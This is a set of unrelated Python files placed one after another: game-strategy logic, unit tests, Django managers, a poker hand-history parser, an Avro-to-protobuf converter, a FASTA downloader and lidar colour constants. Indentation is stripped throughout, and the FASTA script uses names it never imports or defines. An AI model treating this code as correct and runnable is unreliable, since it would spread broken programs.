opponent_stats = dict(zip(*numpy.unique(opponent_history, return_counts=True)))
our_n_defection = our_stats.get(0, 0)
opponent_n_defection = opponent_stats.get(0, 0)
if opponent_n_defection > 0:
defection_ratio = Decimal(int(our_n_defection)) / Decimal(int(opponent_n_defection))
else:
defection_ratio = 1
be_patient = defection_ratio > LOWER_BOUND
choice = (
1
if (opponents_last_move == 1 or (be_patient and our_second_last_move == 0))
else 0
)
return choice, None |
import unittest
from .mock import MockReader, MockSummarizer
##__________________________________________________________________||
class TestMockReader(unittest.TestCase):
def setUp(self):
self.summarizer = MockSummarizer([])
self.obj = MockReader(self.summarizer)
def tearDown(self):
pass
def test_repr(self):
repr(self.obj)
def test_results(self):
self.assertIs(self.summarizer, self.obj.results())
##__________________________________________________________________||
|
import unittest
from onlinejudge.service.codechef import CodeChefProblem, CodeChefService
from onlinejudge.type import SampleParseError, TestCase
class CodeChefSerivceTest(unittest.TestCase):
def test_from_url(self):
self.assertIsInstance(CodeChefService.from_url('https://www.codechef.com/'), CodeChefService)
self.assertIsNone(CodeChefService.from_url('https://www.facebook.com/'))
class CodeChefProblemTest(unittest.TestCase):
def test_from_url(self):
self.assertEqual(CodeChefProblem.from_url('https://www.codechef.com/COOK113A/problems/DAND').contest_id, 'COOK113A')
self.assertEqual(CodeChefProblem.from_url('https://www.codechef.com/COOK113A/problems/DAND').problem_id, 'DAND')
@unittest.skip("the parser is broken now. see https://github.com/online-judge-tools/api-client/issues/49")
def test_download_samples(self):
self.assertEqual(CodeChefProblem.from_url('https://www.codechef.com/COOK113A/problems/DAND').download_sample_cases(), [
TestCase(name='sample', input_name='Example Input', input_data=b'6\n1 9 3\n4 7 1\n10 75 12\n3 8 3\n5 10 2\n192 913893 3812\n', output_name='Example Output', output_data=b'4\n7\n64\n4\n8\n909312\n'),
])
self.assertEqual(CodeChefProblem.from_url('https://www.codechef.com/PLIN2020/problems/CNTSET').download_sample_cases(), [
TestCase(name='sample', input_name='Sample Input', input_data=b'4 2\n', output_name='Sample Output', output_data=b'12\n'),
])
@unittest.skip("the parser is broken now. see https://github.com/online-judge-tools/api-client/issues/49")
def test_download_samples_todo(self):
self.assertRaises(SampleParseError, lambda: CodeChefProblem.from_url('https://www.codechef.com/CNES2017/problems/ACESQN').download_sample_cases())
|
from __future__ import unicode_literals
from datetime import timedelta
from django.db import models
from django.conf import settings
from django.utils import timezone
from django.contrib.contenttypes.models import ContentType
class HitCountManager(models.Manager):
def get_for_object(self, obj):
ctype = ContentType.objects.get_for_model(obj)
hit_count, created = self.get_or_create(content_type=ctype,
object_pk=obj.pk)
return hit_count
class HitManager(models.Manager):
def filter_active(self, *args, **kwargs):
grace = getattr(settings, 'HITCOUNT_KEEP_HIT_ACTIVE', {'days': 7})
period = timezone.now() - timedelta(**grace)
return self.filter(created__gte=period).filter(*args, **kwargs)
|
"""
Created on Sat Aug 15 14:27:18 2021
@author: Peter
"""
from dataclasses import dataclass
from typing import Optional, Union, List
def _player_name(text: str) -> Optional[str]:
if ' @ ' in text:
return text.split('"')[1].split('@')[0].strip()
else:
return None
def _player_index(text: str) -> Optional[str]:
if ' @ ' in text:
return text.split('@')[1].split('"')[0].strip()
else:
return None
def _stack(text: str) -> Optional[int]:
if 'stack of ' in text:
return int(text.split('stack of ')[1].split('.')[0])
else:
return None
@dataclass
class LineAttributes:
"""
Applies attributes to a respective Class object.
:param text: A line of text from the data.
:type text: str
:example: *None*
:note: This class is intended to be used internally.
"""
def __init__(self, text: Union[str, None]):
self._text = None
self._player_name = None
self._player_index = None
self._stack = 0
if text is not None:
self.text = text
self._player_name = _player_name(self.text)
self._player_index = _player_index(self.text)
self._stack = _stack(self.text)
self._position = None
self._winning_hand = None
self._cards = None
self._current_round = None
self._pot_size = 0
self._remaining_players = None
self._action_from_player = 'None'
self._action_amount = 0
self._all_in = False
self._game_id = None
self._start_chips = 0
self._current_chips = 0
self._winner = None
self._win_stack = None
self._time = None
self._previous_time = None
self._start_time = None
self._end_time = None
@property
def text(self) -> Union[str, None]:
"""Text input"""
return self._text
@text.setter
def text(self, val):
self._text = val
@property
def player_name(self) -> Union[str, None]:
"""Player Name"""
return self._player_name
@player_name.setter
def player_name(self, val):
self._player_name = val
@property
def player_index(self) -> Union[str, None]:
"""Player Id"""
return self._player_index
@player_index.setter
def player_index(self, val):
self._player_index = val
@property
def stack(self) -> Union[int, None]:
"""Amount offered to the table"""
return self._stack
@stack.setter
def stack(self, val):
self._stack = val
@property
def position(self) -> Union[str, None]:
"""Position of move in relation to table cards being drawn"""
return self._position
@position.setter
def position(self, val):
self._position = val
@property
def winning_hand(self) -> Union[str, None]:
"""Winning hand"""
return self._winning_hand
@winning_hand.setter
def winning_hand(self, val):
self._winning_hand = val
@property
def cards(self) -> Union[str, list, None]:
"""Card or cards"""
return self._cards
@cards.setter
def cards(self, val):
self._cards = val
@property
def current_round(self) -> Union[int, None]:
"""Round number within the game"""
return self._current_round
@current_round.setter
def current_round(self, val):
self._current_round = val
@property
def pot_size(self) -> Union[int, None]:
"""Size of pot when move happens"""
return self._pot_size
@pot_size.setter
def pot_size(self, val):
self._pot_size = val
@property
def remaining_players(self) -> Union[List[str], None]:
"""Players left in hand"""
return self._remaining_players
@remaining_players.setter
def remaining_players(self, val):
self._remaining_players = val
@property
def action_from_player(self) -> Union[str, None]:
"""Who bet previously"""
return self._action_from_player
@action_from_player.setter
def action_from_player(self, val):
self._action_from_player = val
@property
def action_amount(self) -> Union[int, None]:
"""Previous bet amount"""
return self._action_amount
@action_amount.setter
def action_amount(self, val):
self._action_amount = val
@property
def all_in(self) -> Union[bool, None]:
"""Notes if player when all-in"""
return self._all_in
@all_in.setter
def all_in(self, val):
self._all_in = val
@property
def game_id(self) -> Union[str, None]:
"""File name"""
return self._game_id
@game_id.setter
def game_id(self, val):
self._game_id = val
@property
def starting_chips(self) -> Union[int, None]:
"""Player's chip count at start of hand"""
return self._start_chips
@starting_chips.setter
def starting_chips(self, val):
self._start_chips = val
@property
def current_chips(self) -> Union[int, None]:
"""Player's chip count at time of move"""
return self._current_chips
@current_chips.setter
def current_chips(self, val):
self._current_chips = val
@property
def winner(self) -> Union[str, None]:
"""Player Name who wins the hand"""
return self._winner
@winner.setter
def winner(self, val):
self._winner = val
@property
def win_stack(self) -> Union[int, None]:
"""Amount won at end of hand"""
return self._win_stack
@win_stack.setter
def win_stack(self, val):
self._win_stack = val
@property
def time(self):
"""Timestamp of action"""
return self._time
@time.setter
def time(self, val):
self._time = val
@property
def previous_time(self):
"""Timestamp of previous action"""
return self._previous_time
@previous_time.setter
def previous_time(self, val):
self._previous_time = val
@property
def start_time(self):
"""Timestamp of the start of the hand"""
return self._start_time
@start_time.setter
def start_time(self, val):
self._start_time = val
@property
def end_time(self):
"""Timestamp of the end of the hand"""
return self._end_time
@end_time.setter
def end_time(self, val):
self._end_time = val
@dataclass
class Requests(LineAttributes):
"""Class for players Requesting a seat."""
def __init__(self, text: str):
super().__init__(text)
def __repr__(self):
return "Requests"
@dataclass
class Approved(LineAttributes):
"""Class for players when Approved a seat."""
def __init__(self, text: str):
super().__init__(text)
def __repr__(self):
return "Approved"
@dataclass
class Joined(LineAttributes):
"""Class for players Joined the table."""
def __init__(self, text: str):
super().__init__(text)
def __repr__(self):
return "Joined"
@dataclass
class MyCards(LineAttributes):
"""Class for users cards."""
def __init__(self, text: str):
super().__init__(text)
def __repr__(self):
return "Player Cards"
@dataclass
class SmallBlind(LineAttributes):
"""Class for the Small Blind player."""
def __init__(self, text: str):
super().__init__(text)
def __repr__(self):
return "Small Blind"
@dataclass
class BigBlind(LineAttributes):
"""Class for the Big Blind player."""
def __init__(self, text: str):
super().__init__(text)
def __repr__(self):
return "Big Blind"
@dataclass
class Folds(LineAttributes):
"""Class for players that Fold."""
def __init__(self, text: str):
super().__init__(text)
def __repr__(self):
return "Folds"
@dataclass
class Calls(LineAttributes):
"""Class for players that Call."""
def __init__(self, text: str):
super().__init__(text)
def __repr__(self):
return "Calls"
@dataclass
class Raises(LineAttributes):
"""Class for players that Raise."""
def __init__(self, text: str):
super().__init__(text)
def __repr__(self):
return "Raises"
@dataclass
class Checks(LineAttributes):
"""Class for players that Check."""
def __init__(self, text: str):
super().__init__(text)
def __repr__(self):
return "Checks"
@dataclass
class Wins(LineAttributes):
"""Class for players that Win."""
def __init__(self, text: str):
super().__init__(text)
def __repr__(self):
return "Wins"
@dataclass
class Shows(LineAttributes):
"""Class for players that Show their cards."""
def __init__(self, text: str):
super().__init__(text)
def __repr__(self):
return "Shows"
@dataclass
class Quits(LineAttributes):
"""Class for players that Quit the table."""
def __init__(self, text: str):
super().__init__(text)
def __repr__(self):
return "Quits"
@dataclass
class Flop(LineAttributes):
"""Class for Flop cards."""
def __init__(self, text: Union[str, None]):
super().__init__(text)
def __repr__(self):
return "Flop Cards"
@dataclass
class Turn(LineAttributes):
"""Class for Turn card."""
def __init__(self, text: Union[str, None]):
super().__init__(text)
def __repr__(self):
return "Turn Card"
@dataclass
class River(LineAttributes):
"""Class for River card."""
def __init__(self, text: Union[str, None]):
super().__init__(text)
def __repr__(self):
return "River Card"
@dataclass
class Undealt(LineAttributes):
"""Class for Undealt cards."""
def __init__(self, text: str):
super().__init__(text)
def __repr__(self):
return "Undealt"
@dataclass
class StandsUp(LineAttributes):
"""Class for players that Stand Up."""
def __init__(self, text: str):
super().__init__(text)
def __repr__(self):
return "Stand Up"
@dataclass
class SitsIn(LineAttributes):
"""Class for players that Sit In."""
def __init__(self, text: str):
super().__init__(text)
def __repr__(self):
return "Sits In"
@dataclass
class PlayerStacks(LineAttributes):
"""Class for getting players and their stacks at the beginning of a hand"""
def __init__(self, text: str):
super().__init__(text)
def __repr__(self):
return "Player Stacks"
def _request(line: str) -> Optional[Requests]:
if 'requested a seat' in line:
return Requests(line)
else:
return None
def _approved(line: str) -> Optional[Approved]:
if 'The admin approved' in line:
return Approved(line)
else:
return None
def _joined(line: str) -> Optional[Joined]:
if 'joined the game' in line:
return Joined(line)
else:
return None
def _my_cards(line: str) -> Optional[MyCards]:
if 'Your hand' in line:
return MyCards(line)
else:
return None
def _small_blind(line: str) -> Optional[SmallBlind]:
if 'posts a small blind' in line:
return SmallBlind(line)
else:
return None
def _big_blind(line: str) -> Optional[BigBlind]:
if 'posts a big blind' in line:
return BigBlind(line)
else:
return None
def _folds(line: str) -> Optional[Folds]:
if ' folds' in line:
return Folds(line)
else:
return None
def _calls(line: str) -> Optional[Calls]:
if ' calls ' in line:
return Calls(line)
else:
return None
def _raises(line: str) -> Optional[Raises]:
if ' bets ' in line or ' raises ' in line:
return Raises(line)
else:
return None
def _checks(line: str) -> Optional[Checks]:
if ' checks' in line:
return Checks(line)
else:
return None
def _wins(line: str) -> Optional[Wins]:
if ' collected ' in line:
return Wins(line)
else:
return None
def _shows(line: str) -> Optional[Shows]:
if ' shows a ' in line:
return Shows(line)
else:
return None
def _quits(line: str) -> Optional[Quits]:
if ' quits the game ' in line:
return Quits(line)
else:
return None
def _flop(line: str) -> Optional[Flop]:
if 'Flop: ' in line or 'flop' in line:
return Flop(line)
else:
return None
def _turn(line: str) -> Optional[Turn]:
if 'Turn: ' in line or 'turn: ' in line:
return Turn(line)
else:
return None
def _river(line: str) -> Optional[River]:
if 'River: ' in line or 'river: ' in line:
return River(line)
else:
return None
def _undealt(line: str) -> Optional[Undealt]:
if 'Undealt cards: ' in line:
return Undealt(line)
else:
return None
def _stand_up(line: str) -> Optional[StandsUp]:
if ' stand up with ' in line:
return StandsUp(line)
else:
return None
def _sit_in(line: str) -> Optional[SitsIn]:
if ' sit back with ' in line:
return SitsIn(line)
else:
return None
def _player_stacks(line: str) -> Optional[PlayerStacks]:
if 'Player stacks:' in line:
return PlayerStacks(line)
else:
return None
def parser(lines: List[str], times: list, game_id: str) -> list:
"""This parses strings and converts to class objects"""
hand_position = []
start_position = 'Pre Flop'
for line in lines:
if 'Flop:' in line or 'flop:' in line:
start_position = 'Post Flop'
if 'Turn:' in line or 'turn:' in line:
start_position = 'Post Turn'
if 'River:' in line or 'river:' in line:
start_position = 'Post River'
hand_position.append(start_position)
curr_round = 0
for line in lines:
if 'starting hand' in line:
curr_round = int(line.split('starting hand #')[1].split(' (')[0])
break
player_name_lst, player_index_lst, player_value_lst = [], [], []
for line in lines:
if _player_stacks(line=line) is not None:
for play in line.split('#')[1:]:
player_name_lst.append(play.split('@')[0].split('"')[1].strip())
player_index_lst.append(play.split('@')[1].split('"')[0].strip())
player_value_lst.append(int(play.split('(')[1].split(')')[0]))
check_players_name_lst = False
if len(player_name_lst) > 0:
starting_chip_values = dict(zip(player_index_lst, player_value_lst))
current_chip_values = dict(zip(player_index_lst, player_value_lst))
check_players_name_lst = True
start_time_val = times[0]
end_time_val = times[-1]
pot_size = 0
lst = []
previous_time = None
pressor = 'None'
pressor_amount = 0
players_left = player_index_lst
for ind, line in enumerate(lines):
line_time_val = times[ind]
if ind >= 1:
previous_time = times[ind - 1]
if _request(line) is not None:
new = Requests(line)
new.game_id = game_id
new.current_round = curr_round
new.pot_size = pot_size
new.time = line_time_val
new.previous_time = previous_time
new.start_time = start_time_val
new.end_time = end_time_val
if new.position is None:
new.position = hand_position[ind]
lst.append(new)
continue
if _approved(line) is not None:
new = Approved(line)
new.game_id = game_id
new.current_round = curr_round
new.pot_size = pot_size
new.time = line_time_val
new.previous_time = previous_time
new.start_time = start_time_val
new.end_time = end_time_val
if new.position is None:
new.position = hand_position[ind]
lst.append(new)
continue
if _joined(line) is not None:
new = Joined(line)
new.game_id = game_id
new.current_round = curr_round
new.pot_size = pot_size
new.time = line_time_val
new.previous_time = previous_time
new.start_time = start_time_val
new.end_time = end_time_val
if new.position is None:
new.position = hand_position[ind]
lst.append(new)
continue
if _stand_up(line) is not None:
new = StandsUp(line)
new.game_id = game_id
new.current_round = curr_round
new.pot_size = pot_size
new.time = line_time_val
new.previous_time = previous_time
players_left = [player for player in players_left if player != new.player_index]
new.remaining_players = players_left
new.start_time = start_time_val
new.end_time = end_time_val
if check_players_name_lst is True:
new.starting_chips = starting_chip_values[new.player_index]
new.current_chips = current_chip_values[new.player_index]
if new.position is None:
new.position = hand_position[ind]
lst.append(new)
continue
if _sit_in(line) is not None:
new = SitsIn(line)
new.game_id = game_id
new.current_round = curr_round
new.pot_size = pot_size
new.time = line_time_val
new.previous_time = previous_time
new.start_time = start_time_val
new.end_time = end_time_val
if check_players_name_lst is True:
new.starting_chips = new.stack
new.current_chips = new.stack
if new.position is None:
new.position = hand_position[ind]
lst.append(new)
continue
if _my_cards(line) is not None:
new = MyCards(line)
new.game_id = game_id
new.current_round = curr_round
new.pot_size = pot_size
new.time = line_time_val
new.previous_time = previous_time
if new.cards is None:
new_cards = line.split(' hand is ')[1].split(',')
new.cards = tuple([i.strip() for i in new_cards])
if new.position is None:
new.position = hand_position[ind]
lst.append(new)
continue
if _small_blind(line) is not None:
new = SmallBlind(line)
new.game_id = game_id
new.current_round = curr_round
new.time = line_time_val
new.previous_time = previous_time
new.action_amount = pressor_amount
new.remaining_players = players_left
new.start_time = start_time_val
new.end_time = end_time_val
if new.stack is None:
new.stack = int(line.split('of ')[1])
pot_size += new.stack
new.pot_size = pot_size
pressor = new.player_index
pressor_amount = new.stack
if check_players_name_lst is True:
current_chip_values[new.player_index] -= new.stack
new.current_chips = current_chip_values[new.player_index]
new.starting_chips = starting_chip_values[new.player_index]
if new.position is None:
new.position = hand_position[ind]
lst.append(new)
continue
if _big_blind(line) is not None:
new = BigBlind(line)
new.game_id = game_id
new.current_round = curr_round
new.time = line_time_val
new.previous_time = previous_time
new.action_from_player = pressor
new.action_amount = pressor_amount
new.remaining_players = players_left
new.start_time = start_time_val
new.end_time = end_time_val
if new.stack is None:
new.stack = int(line.split('of ')[1])
pot_size += new.stack
new.pot_size = pot_size
pressor = new.player_index
pressor_amount = new.stack
if check_players_name_lst is True:
current_chip_values[new.player_index] -= new.stack
new.current_chips = current_chip_values[new.player_index]
new.starting_chips = starting_chip_values[new.player_index]
if new.position is None:
new.position = hand_position[ind]
lst.append(new)
continue
if _folds(line) is not None:
new = Folds(line)
new.game_id = game_id
new.current_round = curr_round
new.pot_size = pot_size
new.time = line_time_val
new.previous_time = previous_time
new.action_from_player = pressor
new.action_amount = pressor_amount
players_left = [player for player in players_left if player != new.player_index]
new.remaining_players = players_left
new.start_time = start_time_val
new.end_time = end_time_val
if check_players_name_lst is True:
new.current_chips = current_chip_values[new.player_index]
new.starting_chips = starting_chip_values[new.player_index]
if new.position is None:
new.position = hand_position[ind]
lst.append(new)
continue
if _calls(line) is not None:
new = Calls(line)
new.game_id = game_id
new.current_round = curr_round
new.time = line_time_val
new.previous_time = previous_time
new.remaining_players = players_left
new.start_time = start_time_val
new.end_time = end_time_val
if new.stack is None:
new_stack = line.split(' calls ')[1]
if ' and ' in new_stack:
new_stack = int(new_stack.split(' and ')[0])
else:
new_stack = int(new_stack)
new.stack = new_stack
pot_size += new.stack
new.pot_size = pot_size
new.action_from_player = pressor
new.action_amount = pressor_amount
if check_players_name_lst is True:
current_chip_values[new.player_index] -= new.stack
new.current_chips = current_chip_values[new.player_index]
new.starting_chips = starting_chip_values[new.player_index]
if new.position is None:
new.position = hand_position[ind]
lst.append(new)
continue
if _raises(line) is not None:
new = Raises(line)
new.game_id = game_id
new.current_round = curr_round
new.time = line_time_val
new.previous_time = previous_time
new.remaining_players = players_left
new.start_time = start_time_val
new.end_time = end_time_val
if new.stack is None:
new_stack = 0
if ' bets ' in line:
new_stack = line.split(' bets ')[1]
if ' raises to ' in line:
new_stack = line.split(' raises to ')[1]
if ' and ' in line:
new_stack = new_stack.split(' and ')[0]
new.all_in = True
new.stack = int(new_stack)
pot_size += new.stack
new.pot_size = pot_size
new.action_from_player = pressor
new.action_amount = pressor_amount
pressor = new.player_index
pressor_amount = new.stack
if check_players_name_lst is True:
current_chip_values[new.player_index] -= new.stack
new.current_chips = current_chip_values[new.player_index]
new.starting_chips = starting_chip_values[new.player_index]
if new.position is None:
new.position = hand_position[ind]
lst.append(new)
continue
if _checks(line) is not None:
new = Checks(line)
new.game_id = game_id
new.current_round = curr_round
new.pot_size = pot_size
new.time = line_time_val
new.previous_time = previous_time
new.action_from_player = pressor
new.remaining_players = players_left
new.start_time = start_time_val
new.end_time = end_time_val
if check_players_name_lst is True:
new.current_chips = current_chip_values[new.player_index]
new.starting_chips = starting_chip_values[new.player_index]
if new.position is None:
new.position = hand_position[ind]
lst.append(new)
continue
if _wins(line) is not None:
new = Wins(line)
new.game_id = game_id
new.current_round = curr_round
new.pot_size = pot_size
new.time = line_time_val
new.previous_time = previous_time
new.remaining_players = players_left
new.start_time = start_time_val
new.end_time = end_time_val
if new.stack is None:
new.stack = int(line.split(' collected ')[1].split(' from ')[0])
if new.winning_hand is None:
if ' from pot with ' in line:
if ', ' in line.split(' from pot with ')[1].split(' (')[0]:
new.winning_hand = line.split(' from pot with ')[1].split(', ')[0]
else:
new.winning_hand = line.split(' from pot with ')[1].split(' (')[0]
if new.cards is None:
if 'combination' in line:
new_cards = line.split(': ')[1].split(')')[0].split(',')
new.cards = tuple([i.strip() for i in new_cards])
if new.position is None:
new.position = hand_position[ind]
if check_players_name_lst is True:
current_chip_values[new.player_index] += new.stack
new.current_chips = current_chip_values[new.player_index]
new.starting_chips = starting_chip_values[new.player_index]
lst.append(new)
continue
if _shows(line) is not None:
new = Shows(line)
new.game_id = game_id
new.current_round = curr_round
new.pot_size = pot_size
new.time = line_time_val
new.previous_time = previous_time
new.start_time = start_time_val
new.end_time = end_time_val
new.remaining_players = players_left
if check_players_name_lst is True:
new.current_chips = current_chip_values[new.player_index]
new.starting_chips = starting_chip_values[new.player_index]
if new.cards is None:
new_cards = line.split(' shows a ')[1].split('.')[0].split(',')
new.cards = [i.strip() for i in new_cards]
if new.position is None:
new.position = hand_position[ind]
lst.append(new)
continue
if _quits(line) is not None:
new = Quits(line)
new.game_id = game_id
new.current_round = curr_round
new.pot_size = pot_size
new.time = line_time_val
new.previous_time = previous_time
players_left = [player for player in players_left if player != new.player_index]
new.remaining_players = players_left
new.start_time = start_time_val
new.end_time = end_time_val
if check_players_name_lst is True:
if new.player_index in starting_chip_values:
new.current_chips = current_chip_values[new.player_index]
new.starting_chips = starting_chip_values[new.player_index]
if new.position is None:
new.position = hand_position[ind]
lst.append(new)
continue
if _flop(line) is not None:
pressor = 'None'
pressor_amount = 0
new = Flop(line)
new.game_id = game_id
new.current_round = curr_round
new.pot_size = pot_size
new.time = line_time_val
new.previous_time = previous_time
new.action_from_player = pressor
new.action_amount = pressor_amount
new.remaining_players = players_left
new.start_time = start_time_val
new.end_time = end_time_val
if new.cards is None:
new_cards = line.split(' [')[1].split(']')[0].split(',')
new.cards = [i.strip() for i in new_cards]
if new.position is None:
new.position = 'Flop'
lst.append(new)
continue
if _turn(line) is not None:
pressor = 'None'
pressor_amount = 0
new = Turn(line)
new.game_id = game_id
new.current_round = curr_round
new.pot_size = pot_size
new.time = line_time_val
new.previous_time = previous_time
new.action_from_player = pressor
new.action_amount = pressor_amount
new.remaining_players = players_left
new.start_time = start_time_val
new.end_time = end_time_val
if new.cards is None:
new.cards = line.split(' [')[1].split(']')[0].strip()
if new.position is None:
new.position = 'Turn'
lst.append(new)
continue
if _river(line) is not None:
pressor = 'None'
pressor_amount = 0
new = River(line)
new.game_id = game_id
new.current_round = curr_round
new.pot_size = pot_size
new.time = line_time_val
new.previous_time = previous_time
new.action_from_player = pressor
new.action_amount = pressor_amount
new.remaining_players = players_left
new.start_time = start_time_val
new.end_time = end_time_val
if new.cards is None:
new.cards = line.split(' [')[1].split(']')[0].strip()
if new.position is None:
new.position = 'River'
lst.append(new)
continue
if _undealt(line) is not None:
pressor = 'None'
pressor_amount = 0
new = Undealt(line)
new.game_id = game_id
new.current_round = curr_round
new.pot_size = pot_size
new.time = line_time_val
new.start_time = start_time_val
new.end_time = end_time_val
new.previous_time = previous_time
new.action_from_player = pressor
new.action_amount = pressor_amount
new.remaining_players = players_left
if new.cards is None:
new_cards = line.split(' [')[1].split(']')[0].split(',')
new.cards = [i.strip() for i in new_cards]
if new.position is None:
if len(new.cards) == 1:
new.position = 'Post Turn'
elif len(new.cards) == 2:
new.position = 'Post Flop'
lst.append(new)
continue
if _player_stacks(line) is not None:
new = PlayerStacks(line)
new.game_id = game_id
new.current_round = curr_round
new.pot_size = pot_size
new.time = line_time_val
new.previous_time = previous_time
new.player_name = player_name_lst
new.player_index = player_index_lst
new.remaining_players = players_left
new.start_time = start_time_val
new.end_time = end_time_val
new.stack = 0
if check_players_name_lst is True:
new.current_chips = player_value_lst
new.starting_chips = player_value_lst
if new.position is None:
new.position = hand_position[ind]
lst.append(new)
continue
return lst
class_object_lst = [Requests, Approved, Joined, MyCards, SmallBlind, BigBlind, Folds, Calls, Raises, Checks, Wins,
Shows, Quits, Flop, Turn, River, Undealt, StandsUp, SitsIn, PlayerStacks]
|
import json
import re
from ..meta import ProtocolMeta
class Avro(ProtocolMeta):
# To protobuf
PRIMITIVES = {
'null': None,
'boolean': 'bool',
'int': 'sint32',
'long': 'sint64',
'float': 'float',
'double': 'double',
'bytes': 'bytes',
'string': 'string',
}
def __init__(self, filepath):
super(Avro, self).__init__(filepath)
def to_protobuf(self, indent=4, syntax='proto3'):
lines = ''
with open(self._filepath) as fp:
records = json.loads(fp.read())
match = re.match(r'^proto(\d+)$', syntax)
if match:
syntax = match.group(1)
# If protocol buffers syntax is greater than or equal to v3,
# then include the `syntax` statement at the beginning of
# the file.
if int(syntax) >= 3:
lines += 'syntax = "proto{}";\n'.format(syntax)
lines += '\n'
first = 0
last = len(records) - 1
for i in range(len(records)):
lines += '\n' if i != first else ''
lines += 'message {}'.format(records[i]['name'])
lines += ' {\n'
fields = records[i]['fields']
for j in range(len(fields)):
lines += ' ' * indent + '{} {} = {};\n'.format(
self.PRIMITIVES[fields[j]['type']],
fields[j]['name'],
j + 1,
)
lines += '}\n' if i != last else '}'
return lines
|
'''
||| ||| ||||||||| ||| |||
||| ||| ||| ||| ||| |||
|||||||||| ||| ||| || ||
|||||||||| ||| ||| ||| || |||
||| ||| ||| ||| ||||||||||||
||| ||| ||||||||| ||| |||
||||||||||| |||||||||
||| ||| |||
||| ||| |||
||| ||| |||
||| ||| |||
||| |||||||||
||||||||||| ||| ||| |||| |||
||| ||| ||| ||| ||| || |||
||||||||||| ||| ||| ||| || |||
||| ||| ||| ||| ||| || |||
||| ||| ||| ||| ||| |||||
||| ||| ||||||||||| ||| ||||
Example:
./DownoloadFastas.py -I ./ENA.txt -O "./SCOPeFastas/" -E [email protected]
|||||||||| |||||||||| ||| ||| ||| ||| ||| ||||||||||
||| ||| ||| ||| ||| ||| ||||| ||||| |||
||| ||| ||| ||| ||| ||| ||| || || ||| ||||||||||
||| ||| ||| ||| ||| ||| ||| ||| ||| ||||||||||
||| ||| ||| ||| ||| ||| ||| ||| |||
|||||||||| |||||||||| ||||||||| |||||||||| ||| ||| ||||||||||
ENA File Columns
·· 01 ·· Test (UniProt Entry)
·· 02 ·· SCOPe Name
·· 03 ·· SCOPe Id
·· 04 ·· Blasth
·· 05 ·· V3
·· 06 ·· V4
·· 07 ·· V5
·· 08 ·· V6
·· 09 ·· V7
·· 10 ·· V8
·· 11 ·· V9
·· 12 ·· V10
·· 13 ·· V11
·· 14 ·· V12
·· 15 ·· Entry.name
·· 16 ·· Status
·· 17 ·· Protein.names
·· 18 ·· Gene.names
·· 19 ·· Organism
·· 20 ·· Length
·· 21 ·· Gene.names...ordered.locus..
·· 22 ·· Pathway
·· 23 ·· DNA.binding
·· 24 ·· Gene.ontology.GO.
·· 25 ·· Sequence.similarities
·· 26 ·· Cross.reference..Pfam.
·· 27 ·· Cross.reference..PANTHER.
·· 28 ·· Cross.reference..Reactome.
·· 29 ·· Cross.reference..UniPathway
·· 30 ·· Cross.reference..BioCyc
·· 31 ·· Ensembl.transcript
·· 32 ·· Cross.reference..KEGG.
·· 33 ·· Cross.reference..PATRIC.
·· 34 ·· EnsemblBacteria.transcript
·· 35 ·· Cross.reference..STRING.
·· 36 ·· Gene.ontology.IDs
·· 37 ·· Cross.reference..eggNOG.
·· 38 ·· Cross.reference..OrthoDB.
·· 39 ·· Gene.names...ORF..
·· 40 ·· Gene.names...primary..
·· 41 ·· Sequence
·· 42 ·· Function..CC.
·· 43 ·· Activity.regulation
·· 44 ·· Gene.names...synonym..
·· 45 ·· Organism.ID
·· 46 ·· Annotation
·· 47 ·· EnsemblPlants.transcript
·· 48 ·· Cross.reference..RefSeq
·· 49 ·· Cross.reference..PlantReactome.
·· 50 ·· Cross.reference.GeneID
·· 51 ·· Cross.reference..EMBL.
'''
#··················································································#
#··················································································#
# Modules #
#··················································································#
#··················································································#
import Bio
from Bio import Entrez
#··················································································#
#··················································································#
# Arguments #
#··················································································#
#··················································································#
# Arguments for request the minmax file paths, elongation profile paths and output path
parser = argparse.ArgumentParser()
parser.add_argument("-I", "--InputFilePath", help="Path to the file that contains the ENA proteins data")
parser.add_argument("-O", "--OutputFolder", help="Path to the folder that will contains the resulting files")
parser.add_argument("-E", "--Email", help="Path to the folder that contains the elongation profile files")
args = parser.parse_args()
# Get the content of the arguments
filepath = args.InputFilePath
PathMinMax = args.OutputFolder
mail = args.Email
#··················································································#
#··················································································#
# Main Code #
#··················································································#
#··················································································#
# Log in entrez
Entrez.email = mail
first = 1
# open file
with open(filepath,"r") as file:
for line in file:
# ignore first line
if first == 1:
first = 0
continue
# get the columns elements in the list
line = line.replace("\n","").split("\t")
# extract elements
geneName = line[17]
Organism = line[18].split(" (")[0]
scope = line[1]
protein = line[16]
entry = line[0]
idEMBL = line[50].split(";")
idEMBL.remove('')
# header of the file that contains the protein data
header = ">{}\t{}\t{}\t{}\n".format(entry,geneName,Organism,protein)
# loop through the ids on EMBL
for count,element in enumerate(idEMBL):
# if we the script could access to the id we write the sequence in a new file
try:
handle = Entrez.efetch(db="nucleotide", id=element, rettype="gb", retmode="text")
record = SeqIO.read(handle, "genbank")
handle.close()
sequence = str(record.seq)
newpath ="{}{}({}).fasta".format(fastasDir,scope,count)
# open the new file and write the data
with open(newpath,"w") as newfile:
newfile.write(header)
for num,char in enumerate(sequence):
newfile.write(char)
if ((num%69 == 0) and (num!=0)):
newfile.write("\n")
# if we can not access to the id we ignore this data and continue with the next id
except:
continue
print("Archivos fasta descargados exitosamente")
|
# -*- coding: utf-8 -*-
"""
Utility functions for 3d lidar visualization and processing by utilizing open3d.
"""
# Author: CARLA Team, Runsheng Xu <[email protected]>
# License: MIT
import time
import open3d as o3d
import numpy as np
from matplotlib import cm
from scipy.stats import mode
import opencda.core.sensing.perception.sensor_transformation as st
from opencda.core.sensing.perception.obstacle_vehicle import is_vehicle_cococlass, ObstacleVehicle, StaticObstacle
VIRIDIS = np.array(cm.get_cmap('plasma').colors)
VID_RANGE = np.linspace(0.0, 1.0, VIRIDIS.shape[0])
LABEL_COLORS = np.array([
(255, 255, 255), # None
(70, 70, 70), # Building
(100, 40, 40), # Fences
(55, 90, 80), # Other
(220, 20, 60), # Pedestrian
(153, 153, 153), # Pole
(157, 234, 50), # RoadLines
(128, 64, 128), # Road
(244, 35, 232), # Sidewalk
(107, 142, 35), # Vegetation
(0, 0, 142), # Vehicle
(102, 102, 156), # Wall
(220, 220, 0), # TrafficSign
(70, 130, 180), # Sky
(81, 0, 81), # Ground
(150, 100, 100), # Bridge
(230, 150, 140), # RailTrack
(180, 165, 180), # GuardRail
(250, 170, 30), # TrafficLight
(110, 190, 160), # Static
(170, 120, 50), # Dynamic
(45, 60, 150), # Water
(145, 170, 100), # Terrain
]) / 255.0 # normalize each channel [0-1] since is what Open3D uses
